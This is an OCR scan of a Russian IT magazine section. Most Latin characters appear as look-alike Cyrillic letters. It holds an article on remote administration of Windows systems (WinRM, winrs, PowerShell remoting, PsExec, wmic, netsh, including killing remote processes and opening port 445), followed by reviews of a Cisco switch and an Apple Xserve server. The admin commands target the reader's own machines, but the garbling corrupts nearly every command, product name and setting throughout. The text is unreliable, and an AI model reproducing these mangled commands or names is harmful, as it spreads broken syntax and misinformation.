Оігесіогу), РКМ^пп.тзс (сертификаты и ключи), ІРАбсігМ^пп.тзс (ІР- 
адреса, БНСР, БЫВ, ѴѴІЫ5) . Активация пункта Кетозе Асітіпізіігагіоп 
(НТМЬ) в настройках 115 дает возможность удаленно управлять серве- 
ром при помощи веб-браузера (порт 8098) . В ѴѴіп2к8 появился новый 
инструмент управления сервером — Зегѵег Мапа^ег, являющийся, по 
сути, универсальным центром, куда добавляются все роли и функции 
по настройке сервера. Правда, возможность подключения к другому 
серверу появилась в Зегѵег Мапа^ег лишь в ѴѴіп2к8К2. Оснастки ММС 
в ѴѴіп2к8, предназначенные для удаленного управления, объединены 
в компонент Средства удаленного администрирования сервера (К5АТ, 
Кетоіе Зегѵег Асітіпізігаііоп Тооіз), и большая часть из них в ѴѴіп2к8 
по умолчанию не устанавливается. Кроме этого, свой К5АТ есть и для 
ѴІ5іа/ѴѴіп7, он в свободном доступе лежит на сайте Місгозоіт. С его 
помощью можно управлять из ѴІ5іа/ѴѴіп7 ролями и компонентами на 
серверах, работающих под управлением ѴѴіп2кЗ/2к8/2к8К2. 
Напомню, что консоль ММС позволяет подключаться, управлять 
удаленной системой и следить за ее состоянием. Для этого необхо- 
димо лишь добавить оснастку Управление компьютером (Сотріпег 
Мапа^етепі) и затем в новом окне выбрать управление другим ком- 
пьютером (Апоійег Сотріпег) . Кстати, многие консольные утилиты, 
входящие в стандартную поставку ѴѴіпсІоѵѵз, умеют выполнять коман- 
ды на удаленных системах. Например, запустим утилиту 5С и получим 
список сервисов на компе \\$упаск: 

> ЗС \\зупаск диегу куре= зегѵісе зкаке= аіі 

Планировщик заданий (Тазк Зсйесіиіег) также имеет параметр «А», 
при помощи которого задается целевая машина, где будет выполнено 
задание, что делает его весьма полезным инструментом. 

СЛУЖБА УДАЛЕННОГО УПРАВЛЕНИЯ ѴШКМ Первая версия службы 
удаленного управления ѴѴіпКМ появилась в ѴІ5іа/ѴѴіп2к8 и явля- 
ется Місгозоіг-вариантом реализации протокола ѴѴеЪ Зегѵісез іог 



Мапа^етепі (ѴѴ5-Мапа§етепі Ргоіосоі), позволяющего управлять 
локальными и удаленными системами посредством ХМЬ-сообщений. 
Запущенная служба ѴѴіпКМ предоставляет доступ ко всем ѴѴМІ-дан- 
ным (о них ниже), но в более удобной форме. Первая версия исполь- 
зовала стандартные порты НТТР/НТТР5, что делало ее дружелюбной 
для брандмауэров и позволяло подключиться к удаленной системе 
практически с любого компьютера, имеющего доступ к сети. В ѴѴіпКМ 
2.0 по умолчанию для удаленного доступа используются порты с номе- 
рами 5985/5986, плюс для локального — 47001/ТСР. Хотя при необхо- 
димости можно достаточно просто вернуть стандартные 80/443. 

В целях безопасности весь трафик по умолчанию шифруется, поэтому 
команды и пароли нельзя подсмотреть, аутентификация произво- 
дится с использованием КегЬегоз (возможно СгебЗЗР) . Причем все 
компьютеры должны входить в домен. 

В ѴѴіп2к8К2 и ѴѴіп7 включен последний релиз ѴѴіпКМ 2.0. Для 
ѴѴіпХР5РЗ/2к38Р2/ѴІ5іа8Р1/2к8/2к85Р2 эту версию можно уста- 
новить при помощи пакета ѴѴіпсіоѵѵз Мапа^етепі Ргатеѵѵогк Соге 
(ѴѴіпсІоѵѵз РоѵѵегЗЬеІІ 2.0, ѴѴіпКМ 2.0, ВІТ5 4.0, зиррогі.тісгозоК.сот/ 
кЪ/968929) . Установка тривиальна и не должна вызвать трудностей. 
Чтобы служба ѴѴіпКМ могла принимать сетевые запросы, ее нужно 
предварительно настроить: 

> ѵ^іпгш диісксопкід 

Отвечаем на ряд вопросов, после чего сервис ѴѴіпКМ устанавлива- 
ется в автозапуск, активируется прослушивание портов 5985/5986, 
а также перестраиваются правила ѴѴіпсіоѵѵз Рігеѵѵаіі. Чтобы ѴѴіпКМ 
прослушивал порты 80/443, просто изменим его настройки: 

> ѵ\?іпгт зек ѵѵіпгт/ сопкід/ зегѵісе @ {ЕпаЪІеСотракіЪіІікуН 
ккрЬізкепег= " кгие" } 

> міпгт зек ѵ\Апгт/сопкід/ зегѵісе @ {ЕпаЫеСотракіЬіІікуН 
ккрзЬізкепег=" кгие" } 

Если в последствии будут обнаружены проблемы с подключением, 
смотрим вывод команд «ѵѵіпгт епитегаіе ѵѵіпгт/сопй^/Нзіепег» и 
«ѵѵіпгт §еі ѵѵіпгт/сопй§». Кстати, веб-сервер и ѴѴіпКМ, прослушиваю- 
щие 80 порт, не будут друг другу мешать: все дело в том, что для ѴѴіпКМ 
зарезервировано размещение «/ѵѵзтап», поэтому на веб-сервере 
следует избегать использования такого ІІКЬ. 

Другим вариантом настройки является использование групповых 
политик. Нужные установки найдешь в «Конфигурация компью- 
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> іпіо 

• 0 РоѵѵегЗНеІІ читай 
в статье «Капитан 
РоѵѵегЗЬеЦ 

и администрирование 
будущего», опубли- 
кованной в сентябрь- 
ском номережурнала 
за 2009 год. 

• РоѵѵегЗЬе 112.0 по 
умолчанию входит 
в состав ѴѴіп2к8Р2 и 
ѴѴіп7. 

• Впервые поддержка 
протокола РОР(порт 
3389] появилась в 
ѴѴіпІЧТ 4.0ТегтіпаІ 
5егл/ег. 

• Существует реали- 
зация РОР-сервера и 
для ІІпіх систем — Хгбр 
[ хгсір.зі.пеі ]. Однако 
проект не пользуется 
популярностью, 

и более двух лет не 
обновлялся. 

• Подключение по 
ПОР работает даже по 
медленным каналам, 
при работе через ЫАТ- 
устройства, поддержи- 
вающиетехнологию 
ІІРпР 




ПОДКЛЮЧАЕМСЯ В ММС КОНСОЛИ КУДА- 
ЛЕННОЙ СИСТЕМЕ 



тера — Политики — Административные шаблоны — 
Компоненты ѴѴіпсІоѵѵз — Удаленное управление 
ѴѴіпсІоѵѵз» (Сотріиег СопН^игагіоп — Асітіпізггагіѵе 
Тетріагез — ѴѴіпсІоѵѵз Сотропегнз — ѴѴіпсІоѵѵз Кетоге 
Мапа^етепі:) . Здесь два подпункта, в которых произ- 
водятся соответственно настройки клиентов ѴѴіпКЗ 
и сервера ѴѴіпКМ. Например, в «Разрешить автомати- 
ческую настройку прослушивателей» (АПоѵѵ атотаНс 
сопН^игагіоп оИізгепегз) можно задать диапазон ІР- 
адресов, с которых разрешены подключения. 

В консоли такие системы добавляются в ТгшГесІНозЩ: 

> ѵтіпгт зек міпгт/сопкід/сііепк @ 

{ТгизкесІНозкз = " зупаск" } 




АКТИВИРУЕМ УДАЛЕННОЕ УПРАВЛЕНИЕ В 
Р0ѴѴЕВ5НЕЫ. 



ѴѴіпКМ 2.0, все возможности которого используются по полной 
программе : подключение к системам через прокси-сервера, 
работа по стандартным портам НТТР/НТТР5, шифрование пе- 
редаваемых данных с использованием ЗЗЬ и т.д . Что интересно, 
РоѵѵегЗЬеІІ Кетогіп§ позволяет не просто выполнять команды 
на одном или множестве удаленных хостов (параллельно или 
последовательно) , но и отслеживать их выполнение, получать 
результаты их работы. При первом запуске РоѵѵегЗЬеІІ-скрип- 
та, скорее всего, появится сообщение о том, что выполнение 
Ро\ѵегЗЬе11 скриптов на данной системе заблокировано, и 
дается рекомендация набрать «§ег-1іе1р аЬоиг_5І§піп§». Все дело 
в политиках. Смотрим текущее положение дел: 



Соответственно, чтобы просмотреть настройки, использу- РЗ С:\> Сек-ЕхесикіопРоІісу 
ем аргумент §еГ: КезкгіскесІ 



> ѵтіпгт дек ілАпгт/сопкід/сІіепк 

Клиентская часть заключена в консольной утилите ѴѴіпКЗ. 
По умолчанию команды выполняются на текущем узле, 
но стоит добавить параметр '-г', и можно подключиться к 
удаленной системе: 

> ѵтіпгз -г: зупаск стсі.ехе 

> кюзкпате 



В таком варианте сможем запускать лишь отдельные 
команды, выполнение сценариев запрещено. Установим 
«КешогеЗі^песІ»: 

РЗ С : \> Зек-ЕхесикіопРоІісу КетокеЗідпесІ 

Подтверждаем запрос на изменение политики. 
Подготовить систему для удаленного управления доста- 
точно просто, вводим в консоли РоѵѵегЗЬеІІ: 



• При использова- 
нии протокола ПОР 
би выше можно 
подключаться не к 
виртуальной консоли, 
а непосредственно к 
консоли 0, для этого 
следует за пустить 
терминальный клиент 
с ключом «/сопзоіе». 

• Служба Тегті па I 
Зегл/ісезѴѴеЬАссезз 
будет та кже п ол ез н а 
в том случае, если со- 
трудникам приходится 
подключаться куда- 
ленным ресурсам из 
интернет-кафе, имея в 
своем распоряжении 
только веб-браузер. 



зупаск 

> ірсопкід 

В итоге мы получаем нечто вроде 55Н-сессии, отлично 
защищенной и позволяющей управлять удаленным 
компьютером. Утилита ѴѴіпКЗ использует оболочку стб, 
в чем нетрудно убедиться, просмотрев список доступных 
команд по «ѴѴІПГ5 Ьеір». Конечно же, команду можно задать 
и сразу, не вызывая напрямую оболочку стб: 

> ѵгіпгз -г: зупаск " сііг С: " 

По умолчанию используется протокол НТТР, но перейти 
на НТТР5 очень просто: 

> ѵтіпгз -г :Тккрз : //зупаск "казкіізк" 

Р0ѴѴЕК5НЕІ.І. КЕМ0ТІЫ6 Одним из главных нововведений 
командной оболочки РоѵѵегЗЬеІІ версии 2 . 0 стало удаленное 
выполнение команд — Кетоі:іп§. В основе этой фичи лежит 



РЗ С : \> ЕпаЫе-РЗКетокіпд 

Будет запрошено подтверждение на выполнение ряда 
операций (ключ '-Рогсе' запустит без подтверждений) . 
После этого автоматически будет сконфигурирован 
сервис ѴѴіпКМ на автозапуск, созданы исключения в 
правилах ѴѴР (аналогичные «ѵѵіпгз цшсксопП^», точнее 
5ег-ѴѴ5МапОиіскСопН§), создан прослушиватель НТТР 
для приема ѴѴ5-Мапа§етепі: на любом из ІР-адресов ком- 
пьютера. При необходимости отключить возможность 
удаленного управления также просто: 

РЗ С : \> БізаЫе-РЗКетокіпд 

Для проверки работы удаленного управления можно 
использовать, например, командлетТезг-ѴѴЗМап: 

РЗ С:\> Тезк-ШЗМап -СотрикегЫате зупаск. ги\ 

Теперь у нас два варианта выполнения Р5-командлетов 
на удаленной системе: интерактивный и командный. В 
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“ Аднинист рм тор: Командная строка 








С:\иЁ-еи*5ЧЙдмин«стратор>і-ііпг(п дей иіпгт^сопрід 
СопР ід 

НахЕпие ІореКігекЪ = І50 
НахТіизоиСгоз = 60ОѲ0 
МахВаСсЫСеиз = 32Ш0П 
МахРгоѵ ійегНе диабаз н 429496729 5 
СІіепС 

Ме 1: мо Р кРе I ау п а - 5000 
иНСРге^іх - ѵлзпап 
ЙІІоиІіпепсі'урСесІ ~ Раізе 

ЙисЬ 

Ваз іс = Ь ічіе 
Мдез г - ірие 
Ке і'Ъе і' о 3 = С ічіе 
МедоЪ іаЪе = 1 гие 
Се г Ъ і ? іс ай е - I; гие 
СрёйБЕР = Гаізе 
Ве^аиІгРо гіз 

НТТР = 5985 
НТТР5 = 5986 
ТічікЪесШозЪн 
8еру ісе 

НооіЙВВЬ = 0:Н5С:ВАЕ:Р<&; ;СЙ; ; ; ВА >5 :Р< Аи ; РА ;СА ; ; ;МВХАІІ;8А ;СиСХ; ; ;ИВ> 
МахСопсигі'епСОреі^аСіопз = 4294967295 
НахСопсиРі'епСОрераЕіопзРеризер = 15 
ЕпипіегаСіопТіпеоиСгіз = 6ОШѲ0 
МахСоппесС іоп5 = 25 

МахРаскеСВеСгіеиаІТіпеКесопЛз = 12Ш 
АНоііипепсрурсеЛ - Раізе 
А и* Ь 

Вазіс - Раізе 
Ке рЪе і 1 о з = С ічіе 
Медосіл^е ■ егчде 
Сеі'СіРісаЪе = Раізе 
СігеЛ!>$Р - Раізе 
СЬ^Наі'Леп іпдЬеие 1 = Йеіахесі 
БеР аиХсРо 

НТТР - 5985 
НТТР5 = 5986 
ІРѵ4РіІЪмг ■ * 

ІРѵБРіІЪег = *- 

ЕпаЪІеСотраЪіЪіІіЪуНяЪрЬіз^епеѵ* = Таізе 
ЕпаЫеСопраСіЬіІіСуН^СрзЬізЬепеі' - Таізе 
Сеі'^ір ісаСеТІшсгіЬрі^іпі: 

Уіпрз 

А ИоыВеЕіоСеКІіеІІЙссезз = Сі'ие 
ЫІеТіпѳоис л 180Ѳ00 
МахСопсиі'і ч епСІІзеі і з = 5 
МахЗЬе ІІВипТ іпе = 2147483647 
МахРгосеззезРегКІіеІІ - 15 
МахМегэоі'уРегЕЬеІІМВ - 15Ш 
Мах8Ье ІІзРегВзег = 5 



С:М1зеі'зЧАдпиннстратор> 1ИІ 



г ~Пуск| ] ^ Ж. $ | і_/ Редактор управления г... | | дд Администратор: Кои... 

ПРОСМАТРИВАЕМ УСТАНОВКИ ѴѴШКМ 



©<Ь 



первом случае, используя командлет Епіег-РЗЗеззіоп, под- 
ключаемся к РоѵѵегЗЬеІІ сессии на удаленной системе : 

РЗ С : \> Епкег-РЗЗеззіоп зупаск.ш 

Теперь можем вводить команды, получать ответ, то есть 
работать как за локальной консолью. Чтобы отключиться 
от удаленной системы, набираем ехп или ЕхП-РЗЗеззіоп. 



НАСТРОЙКА РАБОТЫ СЛУЖБЫ УДАЛ ЕН- 
НОГОУПРАВЛЕНИЯ ПРИ ПОМОЩИ ГРУППО- 
ВЫХ политик 




Чтобы выполнить команду на одном или нескольких 
удаленных компьютерах, используется командлет 
Іпѵоке-Соттапб. Список систем можно передать как 
непосредственно в командной строке, так и прописать 
их в текстовом файле (удобно в том случае, если их мно- 
го) . Например, получим список процессов на удаленной 
системе: 

РЗ С : \> Іпѵоке-Сошшапсі -СотрикегЫаше зупаск.ги 
-ЗсгіркВІоск {Сек-Зегѵісе I Еогтак-Ьізк} 

Допускается передача любого количества команд за 
раз (причем для этого удобно задействовать пере- 
менную), что может быть использовано в скриптах 
и для автоматизации операций. Для примера откро- 
ем 445 порт в брандмауэре: 

РЗ С : \> $рогксоштапс1 = {пекзЪ. кігемаіі зек 
рогкорепіпд кср 445 зтЪ епаЫе) 

РЗ С:\> Іпѵоке-Сошшапсі -СотрикегМате зупаск.ги 
-ЗсгіркВІоск $рогксоттапсі 

Кстати, НеізЬ. сам умеет управлять настройками не 
только локальной, но и одной или нескольких уда- 
ленных машин. Достаточно добавить команду «зет 
тасЫпе» или ключ -г', после чего задать ѴѴШЗ/ІШС/ 
БЫЗ имя или ІР-адрес: 




НТТР://ѴШѴѴ 



1 і 

> Ііпкз 

• ѴѴіпсІоѵѵз Мападетегк 
Ргатеѵѵогк Соге для 
\Л/іпХР/2кЗ/ѴІ5Іа/2008 — 
зиррогктісгозой. 
сот/кЬ/ 968929 . 



• Утилиты Зузігкегпаі — 
іесЬпеІ.тісгозоЙ:. 
сот/ги-ги/ 
зѵзіпіегпаіз . 

• МісгозоЙ Зсгірі 
Сепіег — ІесЬпек 
тісгозоЙ.сот/ги- 
ги/зсгірісепіег . 
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5ѴМ/АСК 



Тестер инструментария управления \ѴіпсІоѵ*$ 



Пространство имен: 
гооМеГанІІ 



- П 



Подключить... 



Выход 



Справка 



І\л/ЬетЗегѵісе$ 



Классы... 


Экземпляры... 


Пространство имен... 


Изменить контекст... 


Создать класс... 


Создать экземпляр... 


[ Запрос"!" 


Создать обновитель... 


Открыть класс... 


Открыть экземпляр... 


Запрос уведомления... 




Удалить класс... 


Удалить экземпляр... 


Выполнить метра-. . 



Способы вызова метода 

Асинхронно Включить все привилегии 

■' ‘ Синхронно Измененные квалификаторы 

Полусинхронно Г Прямой доступ при операциях чтения 

Г* Использовать Мех(А$упс (перечисл.) 

[ІО Счетчик пакетов (перечисл.) 5000 Т аймауг, мсек ( "-1 "для бесконечно большого) 

ѴѴВЕМТЕ5Т — ГРАФИЧЕСКАЯ УТИЛИТА ДЛЯ ВЗАИМОДЕЙСТВИЯ С ѴѴМІ 



> пекзк -г зупаск.ги -и 
асітіпізкгаког -р рааэѵгогсі сііад диі 

В итоге получаем НТМЬ-страницу с диагнос- 
тической информацией (сведения о компью- 
тере, сетевые настройки, список служб интер- 
нета), которая может помочь в определении 
источника проблем. 

УТИЛИТА Р5ЕХЕС Утилита РзЕхес не 
входит в стандартную поставку ОС, но 
она достаточно удобна для выполнения 
большинства задач по администрирова- 
нию удаленных систем. Найти ее можно 
в пакете Зузіпнегпаіз РзТооІз ( гесЬпег. 
тісгозоН.согн/ги-ги/зузіпНегпаІз) . Чтобы 
было удобнее вызывать, исполняемый 
файл лучше скопировать в каталог, 
доступный через переменную %ратЬ.% 
(например, 5узі:ет32). Для выполнения 
команд на удаленной системе автома- 
тически запускается служба 5узі:ет32\ 
рзехезѵс.ехе, поэтому для работы с РзЕхес 
необходимы соответствующие админс- 
кие права (в домене или локальной сис- 
теме) . После завершения работы данная 
служба и связанные файлы автоматичес- 
ки удаляются. Общий формат запуска 
следующий: 



рзехес \\сотрикег -и изег -р раззтлгсі 
сотшапсі ключи 

Если имя пользователя отсутствует, то 
подразумевается текущая учетная запись. 
Соответственно, если убрать название 
компьютера, то команда будет выполнена на 
локальной системе. 

Пример использования: 

> рзехес \\зупаск стсі.ехе 

Все, перед нами консоль удаленной системы. 
Сессия никак не шифруется, и данные можно 
перехватить снифером, поэтому РзЕхес следу- 
ет использовать в защищенной среде. Провер- 
ка подлинности производится средствами 
ѴѴіпсіоѵѵз ШЪМ или КегЬегоз. 

При необходимости можно выполнить коман- 
ду одновременно на нескольких системах, 
имена хостов перечисляются через запятую, 
как вариант, их можно вписать в файл тексто- 
вого формата, который и указать при запуске: 

> рзехес @с : Хзузкешз . кхк зкикскжп 
/р /I 

Утилита имеет ряд ключей. Так, ключ '-с' позво- 
лит скопировать программу с локального диска 



на удаленную систему перед ее выполнением. 
Ключ '-і' запускает программу в интерактивном 
режиме. Чтобы РзЕхес «забыл» о запущенной 
программе сразу после ее выполнения, освобо- 
див тем самым консоль, используем '-б': 

> рзехес -б \\зузаск скксізк 

Теперь на удаленной системе инициируется 
проверка дисков, а администратор сможет 
продолжить ввод команд. 

ИНСТРУМЕНТАРИЙ ДЛЯ УПРАВЛЕНИЯ 
ѴѴІЫ00ѴѴ5 Как следует из названия, ѴѴМІ 
также может использоваться для управ- 
ления и доступа к данным на удаленных 
системах. Хотя по сравнению с другими 
методами, рассмотренными ранее, работа 
с ѴѴМІ на порядок сложнее. Но сегодня в 
интернете можно найти большое коли- 
чество готовых скриптов, позволяющих 
после некоторой адаптации выполнить 
практически любую задачу по управлению 
системами и сбору данных. Кроме этого, 
следует учитывать, что некоторые команды 
и параметры специфичны для разных вер- 
сий ОС, поэтому скрипт, написанный для 
ѴѴіп7, в ѴѴіпХР, возможно, не будет работать 
должным образом. Для проверки подлин- 
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О Службы компонентов 



О X 




НАСТРОЙКА БЕЗОПАСНОСТИ БСОМ 



ности используется ЫТЬМ или КегЪегоз, по умолчанию удаленное 
подключение не шифруется, но такая возможность предусмотре- 
на. 

Перед началом использования ѴѴМІ следует запустить ММС-консоль 
БСОМСп^ и разрешить удаленное выполнение ПСОМ-запросов, 
аналогичные действия производятся и для ѴѴМІ в ѵшііт^пп.тзс. Плюс 
создаем разрешающее правило ѴѴіпсІоѵѵз Еігеѵѵаіі для ѴѴМІ: 

> пекзЪ. асіѵкігечлгаіі кігечлгаіі зек гиіе дгоцр-"тшкжа 
тападетепк іпзкгитепкакіоп (ѵлпі) " пем епаЫе=уез 

Возможно несколько вариантов выполнения ѴѴМІ на удаленной сис- 
теме. Скрипты здесь рассматривать не будем, это достаточно емкий 
вопрос. Самый простой способ — использование консольной утилиты 
ѴѴтіс с ключом «/побе». Например, получим список учетных записей 
на удаленном компьютере: 

> ѵѵтіс /посіе : зупаск /ИЗЕК: "изегпате" изегассоипк Іізк 
Ъгіек 

Если нужно выполнить команду сразу на нескольких компьютерах, 
поступаем аналогично РзЕхес, то есть перечисляем их через запятую 
или прописываем в файл. 

Просмотрим список процессов и уничтожим «ненужный»: 

> ѵлпіс /посіе : зупаск ргосезз Іізк 

> ѵлпіс /посіе : зупаск ргосезз ѵЛіеге (іс^" 67 9 " ) саіі 
кегтіпаке 



К слову, штатная команда іазкіізі поддерживает возможность выпол- 
нения на удаленной системе. Формат следующий: 

казкіізк /3 <система> /II 

<домен>\<пользователь> 

То есть, чтобы получить список процессов, выполняемых на удален- 
ной машине, можно сделать так: 

> казкіізк /3 \\зупаск 

Любители графических морд могут выполнить любую ѴѴМІ- 
команду с помощью «Тестера инструментария управления 
ѴѴіпбоѵѵз». Запускаем ѴѴЬетіезі.ехе, нажимаем «Подклю- 
чить» (Кетоіе), прописываем данные удаленной системы 
(\\5упаск\гооі\сітѵ2), выбираем параметры и выполняем 
запрос. 

ЗАКЛЮЧЕНИЕ Конечно, это далеко не все варианты удаленного 
управления и выполнения команд. Не забываем о групповых 
политиках, которые также позволяют произвести большинство 
операций по администрированию систем. Многие языки про- 
граммирования, включая ѴѴіпбоѵѵз Зсгірі: Нозі, .Ие! и так далее 
имеют возможности подключения к удаленному компьютеру 
для выполнения административных операций, не говоря уже о 
многочисленных утилитах сторонних разработчиков. Выбирай 
наиболее подходящий способ и действуй, т 
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5ѴМ/АСК 



I ЫАТНАЫ ВІІЧКЕРТ ЫАТ05ѴЫАСК.ВІІ 




Умная кошка 




СІ5СОѴѴ5-С2960-48ТТ-І_: 
интеллектуальный коммутатор 2-го уровня 
с фиксированной конфигурацией 




Технические характеристики 
СІ5С0 Ж5-С2960-48ТТ-І. 

> Поддержка стандартов: 

АиіоІУШІ/ІѵЮІХ 

ІЕЕЕ 802.1 р ( РгіогіЕу Іадз) 

ІЕЕЕ 802.1 я (ѴЕАІЧ) 

ІЕЕЕ 802.1 сі (Зраппіпд Тгее] 

ІЕЕЕ 802.1 з (МиШрІе Зраппіпд Тгее] 

> Объем ОЗУ/ ПЗУ (РІазЫ: 

64 Мб / 32 Мб 

> Общее количество портов: 

48 х Еібегпеі; 10/100 Мбит/сек 

> Параметры Урііпк-портов: 

2 х ЕОіегпе1 10/100/1000 Мб ит/сек 

> Размер таблицы МАС-адресов: 

8192 




> Производительность: 

Общая производитель- 
ность: 13,6 Гб/с 
Скорость коммута- 
ции: 10,1 Гб/с 



>Управление: 

ѴѴеЬ-интерфейс 
Протоколы 3 N М Р 1 , 
ЕМОІЧ, ТеІпеП 5ІЧМР 
3, 5ІЧМР 2с, 55Нѵ2 



> Питание: 

Внутренний блок 
питания 

Потребляемая мощ- 
ность: 45 Вт 



> Исполнение: 

Для установки в 
стойку 
Размер 445 х 44 х 236 мм 



Коммутатор ѴѴ8-С2960-48ТТ-Б от компа- 
нии Сізсо столь сложен и богат на функ- 
ционал, что дать его объективную оценку 
в таком малом объеме знаков просто не- 
реально. Поэтому мы остановимся только 
на его ключевых возможностях. 

Итак, Сізсо ѴѴ8-С2960-48ТТ-Б — интеллек- 
туальный коммутатор второго уровня на 
48 портов для применения в сфере малого 
и среднего бизнеса. Среди главных досто- 
инств устройства следует выделить: обес- 
печение интегрированной безопасности 
сети, гибкую систему приоритезации тра- 
фика и широкий спектр поддерживаемых 
протоколов и стандартов. 

Коммутатор способен обеспечить чрез- 
вычайно высокий уровень сетевой безо- 
пасности за счет использования таких 
технологий как: списки контроля доступа 
для каждого порта с возможностью прину- 
дительной аутентификации, фильтрация 
по МАС-адресам, шифрование, механизм 
РгіѵаГе ѴЦШ Есі§е для отделения портов 
коммутатора друг от друга, технология 



ЫАС (ЫеГѵѵогк Асітіззіоп СопГгоІ), позволя- 
ющая блокировать доступ нежелательных 
узлов к сети или направить их в карантин- 
ную сеть. Двунаправленный режим обме- 
на данными на портах 8РАЫ (ЗѵѵіГсЬ РогГ 
Апаіугег) позволяет устройствам системы 
обнаружения вторжений в автоматичес- 
ком режиме реагировать на нарушителей 
безопасности. Для получения доступа к 
настройкам маршрутизатора использует- 
ся авторизация по протоколам ТАСАС5+ и 
КАБШ8. 

Контроль над полосой пропускания и 
оптимизация трафика (Оо8 — С^иаШу оГ 
5егѵісе) происходят с помощью назначе- 
ния до 64 индивидуальных или агрегиро- 
ванных правил для всех портов коммута- 
тора. Правила могут опираться на ІР-адрес 
получателя или отправителя, МАС-адрес, 
информацию в заголовках пакетов. Под- 
держивается ЕСК, 8КК 8Йес1и1іп§, ѴѴТО, 
8Ггіс1; Ргіогйу циеиіп§, четыре исходящие 
очереди на порт, шаг для гарантирован- 
ной полосы пропускания виртуального 



канала (СІК) от 8 Кбит/с. Предусмотре- 
но автоматическое управление Оо8. Так, 
после подключения к сети ѴоІР телефона 
настройка Оо8 будет произведена в авто- 
матическом режиме. 

Для агрегации сетевого оборудования ис- 
пользуются комбинированные гигабит- 
ные ирііпк-порты, которые могут объеди- 
няться в один канал с помощью технологии 
6і§аЬі1;Еі:ЬегСЬаппе1. Для резервирования 
основного коммутатора стека применяет- 
ся сервис Сізсо СІи8І:ег Мапа^етепі 8ийе 
(СМ8). 

Настройка коммутатора может быть про- 
изведена, используя протоколы 8NМР 1, 
КМСШ, Теіпе*, 8^Р 3, 8№Ш> 2с и 88Нѵ2. 
Также предусмотрен ѴѴеЬ-интерфейс. 
Вместе с коммутатором поставляется ПО 
Сізсо Ыеіѵѵогк А88І8І:ап1:, которое упроща- 
ет обновление и настройку. Быстрое и 
легкое первоначальное развертывание 
обеспечивает приложение Ехрге88 8еШр. 
Средняя цена на устройство составляет 
66 075 рублей. 
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ните яблоки в стойке 



Обновленный іЫ-сервер: 

ХБегѵе ОиасІ-Соге ІпіеІХеоп от Арріе 



Технические характеристики 
АррІеХзегѵе 

> Процессор: 

Один или два ОиасІ-Соге ІпІеІХеоп 5500 
ЫеЬаІет 2.26, 2.66 или 2.93 ГГц 

> Память: 

До 12 Гб в однопроцессорном варианте 
6 слотов; планками 1 , 2 или 4 Гб 

> Жесткие диски: 

Любая комбинация 5 АТА или 5А5 дисковых 
модулей Арріе 

До 3 Тб, используя три модуля 1 Тб 7200 грт 
5 АТА 

До 1 .35 Тб, используя три модуля 450 Гб 
1 5000 грт 5А5 

> Поддержка РАШ: 

Опционально встроенный РАЮ-контроллер 
Хзегѵе РАЮ Сагб с кеш-памятью 512 Мб и 
резервной батареей на 72часадля кеш-па- 
мяти 

> Сетевой интерфейс: 

2 встроенных интерфейса бідаЬіі ЕіЬегпеі 
(10/100/1000ВА5Е-Т) с поддержкой пакетов 
щтЬо 1га тез 

> Питание: 

Блокпитания на 750 Вт 
Опционально — дополнительный второй 



блок питания на 750 Вт для 
распределения нагрузки, 
с возможностью «горячей» 
замены 

> Расширение: 

Два свободных 16-канальных 
слота РСІ Ехргезз 2.0: один 
слот половинной длины (6.6 
дюйма) и один 9.25-дюймо- 
вый слот 

> Внешние порты ввода-вы- 
вода: 

2 порта ЕігеѴѴіге 800 (общая 
мощность 1 5 Вт) 

2 порта 115В 2.0 

1 порт БВ-9 зегіаі на задней 

панели 

1 порт Б5В 2.0 на лицевой панели 

> Другое: 

Оптический накопитель 8х ЗирегОгіѵе с 
поддержкой двухслойных дисков (0\Ю+Р ОБ/ 
ОѴОіВѴѴ/СВ-ВѴѴ) 

Встроенная графическая карта ІМѴЮІА 
ОеЕогсе ОТ 120 с 256 МБ ОБОРЗ ЗБРАМ; 
выход Міпі ОізрІауРогІ: (переходники на Ѵ6А 
и БѴІ покупаются отдельно) 

> Исполнение: 

Для установки в стойку, формат 1 Б 




высота — 4,4 см 

ширина — 44,7 см 

толщина — 76,2 см 

вес — 14 кг в базовой конфигурации; 

1 7.4 кг стремя дисковыми модулями 5АТА 
1 Тб и двумя блоками питания 

> Гарантия и сервис: 

Один год ограниченной гарантии на завод- 
ские дефекты материалов и сборки 

> Предустановленная ОС: Мае 05 X 5егѵег 

10.5 БеорагсІ (без ограничений на количест- 
во пользовательских подключений) 



Что получится, если объединить усилия 
инженеров серверного оборудования и ди- 
зайнеров? Большинство компаний произ- 
ведет на свет гламурный серверный шкаф, 
но только Арріе смогла привести этот союз 
к созданию стильного, надежного и произ- 
водительного Ш-сервера. 

Хзегѵе ОиасІ-Соге Іпіеі Хеоп — представи- 
тель последнего поколения серверов на- 
чального уровня (производства небезыз- 
вестной яблочной компании). Область 
его применения может простираться от 
веб-серверов и файлового хранилища до 
сервера, выполняющего поддержку раз- 
личных внутрикорпоративных сервисов. 
В стандартной комплектации сервер осна- 
щен одним процессором ОиасІ-Соге Іпіеі 
Хеоп 5500 №Ьа1ет с частотой 2.26 ГГц. 
По просьбе покупателя он может быть 



заменен на два одноименных процессо- 
ра, работающих на частоте 2.26, 2.66 или 
2.93 ГГц. Стандартный объем памяти — 
3 Гб — может быть расширен до 1 2 Гб. Мак- 
симальный объем дисковой памяти может 
составлять 3 Тб при условии использова- 
ния трех ЗАТА-дисков емкостью 1 Гб с под- 
держкой «горячей замены» (есть вариант 
и с ЗЗБ-накопителями). КАГО-контроллер 
с кэш-памятью 512 Мб и резервной бата- 
реей устанавливается по требованию. 
Сервер имеет два интерфейса Оі^аЪіІ 
ЕіЬегпеІ (10/100/1000ВА8Е-Т) и два слота 
РСІ Ехргезз 2.0 (один из которых имеет по- 
ловинную длину). 

Хзегѵе действительно есть, чем отличить- 
ся. Во-первых, сервер оснащен фирмен- 
ным Арріе'овским интерфейсом ЕігеѴѴіге 
(ІЕЕЕ 13946). Во-вторых, это, конечно же, 



предустановленная операционная систе- 
ма Мае 08 X 8егѵег 10.5 Ьеорагсі с немалым 
числом приверженцев. В-третьих, сервер 
оснащен мощным графическим адапте- 
ром 1МѴГОІА ОеЕогсе СТ 120 с 256 Мб памя- 
ти, который, возможно, будет полезен в 
некоторых инсталляциях. 

Есть и недостатки. Хзегѵе оснащен ЕРІ 
(ЕхІепзіЫе Рігтѵѵаге ІпІегГасе) вместо 
ВЮ8, что не дает особых преимуществ, 
однако затрудняет установку сторонних 
операционных систем. Например, чтобы 
установить Ьіпих, придется использовать 
специальный загрузчик, а ѴѴіпсіоѵѵз по- 
дойдет только последних версий, а точнее 
ѴѴіп2к8/ѴѴіп2к8К2. И кого-то может огор- 
чить цена, которая в стандартной комп- 
лектации составляет примерно 130 000 
